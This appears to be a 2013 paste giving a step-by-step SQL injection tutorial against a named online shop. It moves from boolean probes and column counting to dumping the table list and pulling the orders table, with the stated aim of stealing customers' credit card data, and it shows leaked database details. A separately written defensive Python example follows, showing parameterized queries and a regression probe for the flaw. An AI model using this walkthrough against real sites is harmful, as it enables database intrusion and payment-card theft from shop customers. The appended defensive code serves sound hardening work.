hqlan1928

tut hack shop php mysql 5

Dec 20th, 2013
  1. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
  2.  
  3. select * FROM customer_testimonials WHERE testimonials_id = 25\'
  4. To find out whether this error is exploitable, we query a little more to check:
  5.  
  6. https://www.185elgin.com/customer_te...timonial_id=25 and 1=1/*
  7.  
  8. This returns a page for the true condition (1).
  9.  
  10. https://www.185elgin.com/customer_te...timonial_id=25 and 1=0/*
  11.  
  12. This returns a page for the false condition (0).
  13.  
  14. If both conditions above hold, go ahead and hack the site.
  15.  
  16.  
  17. Now we find how many columns this site has, to exploit the error.
  18.  
  19.  
  20.  
  21.  
  22. https://www.185elgin.com/customer_te...,3,4,5,6,7,8--
  23.  
  24. Querying from 1 to 8 produces this error:
  25.  
  26. Quote:
  27.  
  28. The numbers 3 and 6 show up; we take position 3.
  29. 3
  30.  
  31. 6
  32. Use position 3 as the focal point, as below.
  33.  
  34. Now we find out which MySQL version this site runs, so we can adapt the exploitation accordingly.
  35.  
  36. We should use the function concat_ws(0x3a,version(),user(),database()) to find it.
  37.  
  38. https://www.185elgin.com/customer_te...)),4,5,6,7,8--
  39.  
  40. So the MySQL version is 5.0.xx.
  41.  
  42.  
  43. Quote:
  44.  
  45. 5.0.51a-community:sendmc2_script@localhost:sendmc2_185elgin
  46.  
  47. At this point we can exploit it using the MySQL 5.0 injection approach.
  48.  
  49.  
  50. Let's find the site's first table.
  51.  
  52. https://www.185elgin.com/customer_te...0limit%201,1--
  53.  
  54.  
  55.  
  56. Quote:
  57.  
  58. The first table comes out as: COLLATIONS
  59. A small tip for testers too lazy to query the tables one at a time: do it like this.
  60.  
  61.  
  62. https://www.185elgin.com/customer_te...chema.tables--
  63.  
  64.  
  65. Quote:
  66.  
  67.  
  68. CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,address_book,address_format,banners,banners_history,card_surcharges,categories,categories_description,configuration,configuration_group,counter,counter_history,countries,currencies,customer_testimonials,customers,customers_basket,customers_basket_attributes,customers_info,geo_zones,languages,link_categories,link_categories_description,links,links_check,links_description,links_featured,links_status,links_to_link_categories,manufacturers,manufacturers_info,newsletters,orders,orders_maxmind,orders_products,orders_products_attributes,orders_products_download,orders_status,orders_status_history,orders_total,products,products_attributes,products_attributes_download,products_description,products_notifications,products_options,products_options_values,products_options_values_to_product
  69. So now we have the first table and all the site's tables.
  70.  
  71. Now we look for which table contains the cc :d
  72.  
  73. We query to pull all the cc from the orders table.
  74.  
  75. First the name has to be converted to hex.
  76.  
  77. Go here: http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
  78. Converting orders gives this: 0x6F7264657273
  79.  
  80. https://www.185elgin.com/customer_te...0x6F7264657273
  81.  
  82.  
  83. Quote:
  84.  
  85. orders_id
  86.  
  87. 6
  88. Click here to view all testimonials
  89.  
  90.  
  91.  
  92.  
  93. Testimonial by 4
  94. customers_id
  95.  
  96. 6
  97. Click here to view all testimonials
  98.  
  99.  
  100.  
  101.  
  102. Testimonial by 4
  103. customers_name
  104.  
  105. 6
  106. Click here to view all testimonials
  107.  
  108.  
  109.  
  110. ...........................................
  111.  
  112. Done. Now we take the info needed to get the cc.
  113.  
  114. https://www.185elgin.com/customer_te...+from+orders--
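
The 1064 error at the top of this paste shows the quote arriving escaped (25\') while the id itself sits unquoted in the query, which is why the quote-free `and 1=1` / `and 1=0` conditions still reach the SQL parser. As an added example (not part of the original paste; Python with in-memory SQLite stands in for the shop's PHP/MySQL, and all function names are hypothetical), the escaped-but-unquoted lookup is shown beside a validated, parameterized one:

```python
import re
import sqlite3

def make_db():
    # Constructed sample data: one table, one row with id 25.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customer_testimonials (testimonials_id INTEGER, body TEXT)")
    db.execute("INSERT INTO customer_testimonials VALUES (25, 'sample testimonial')")
    return db

def addslashes(value):
    # Quote escaping of the kind visible in the 1064 error above (25\').
    return value.replace("\\", "\\\\").replace("'", "\\'")

def lookup_vulnerable(db, raw_id):
    # Escaped but unquoted: the value lands in a numeric context, so input
    # containing no quote at all is still parsed as part of the statement.
    sql = "SELECT body FROM customer_testimonials WHERE testimonials_id = " + addslashes(raw_id)
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # Allow-list first (ASCII digits only), then bind the value as a parameter
    # so the driver never interprets it as SQL text.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("testimonial id must be a positive integer")
    sql = "SELECT body FROM customer_testimonials WHERE testimonials_id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def responds_to_boolean_probe(lookup, db):
    # Regression check: True if the two conditions from the paste change the
    # result set, i.e. request input is reaching the SQL parser.
    results = []
    for probe in ("25 and 1=1", "25 and 1=0"):
        try:
            results.append(lookup(db, probe))
        except ValueError:
            results.append("rejected")
    return results[0] != results[1]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", responds_to_boolean_probe(lookup_vulnerable, db))
    print("hardened:  ", responds_to_boolean_probe(lookup_hardened, db))
```

A check like `responds_to_boolean_probe` can sit in a test suite so that any handler that starts concatenating request input into SQL again fails the build.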